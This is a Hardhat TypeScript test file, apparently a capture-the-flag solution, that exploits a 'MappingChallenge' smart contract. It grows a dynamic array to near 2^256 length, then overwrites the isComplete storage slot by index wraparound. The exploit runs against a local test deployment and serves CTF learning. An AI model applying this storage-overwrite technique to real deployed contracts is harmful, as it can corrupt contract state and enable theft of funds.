generated from nicobevilacqua/hardhat-solidity-typescript-boilerplate
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathMappingChallenge.test.ts
45 lines (35 loc) · 1.38 KB
/
MappingChallenge.test.ts
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import { SignerWithAddress } from '@nomiclabs/hardhat-ethers/signers';
import { expect } from 'chai';
import { Contract } from 'ethers';
import { ethers, network } from 'hardhat';
const { utils, BigNumber } = ethers;
describe('MappingChallenge', () => {
let target: Contract;
let owner: SignerWithAddress;
let attacker: SignerWithAddress;
before(async () => {
[owner, attacker] = await ethers.getSigners();
const targetFactory = await ethers.getContractFactory('MappingChallenge');
target = await targetFactory.deploy();
await target.deployed();
console.log('Target deployed to:', target.address);
});
it('Exploit', async () => {
let tx;
console.log('1 - Adding padding');
// extending array out of limits
tx = await target.set(BigNumber.from(`2`).pow(`256`).sub(`2`), 2);
await tx.wait();
// map[0] value is stored at keccak(p) = keccak(1)
// needs to be padded to a 256 bit
const mapZeroDirection = `0x0000000000000000000000000000000000000000000000000000000000000001`;
const mapDataBegin = BigNumber.from(utils.keccak256(mapZeroDirection));
const isCompleteOffset = BigNumber.from(`2`).pow(`256`).sub(mapDataBegin);
console.log('2 - Overriding isComplete');
tx = await target.set(isCompleteOffset, `1`);
await tx.wait();
});
after(async () => {
expect(await target.isComplete()).to.equal(true);
});
});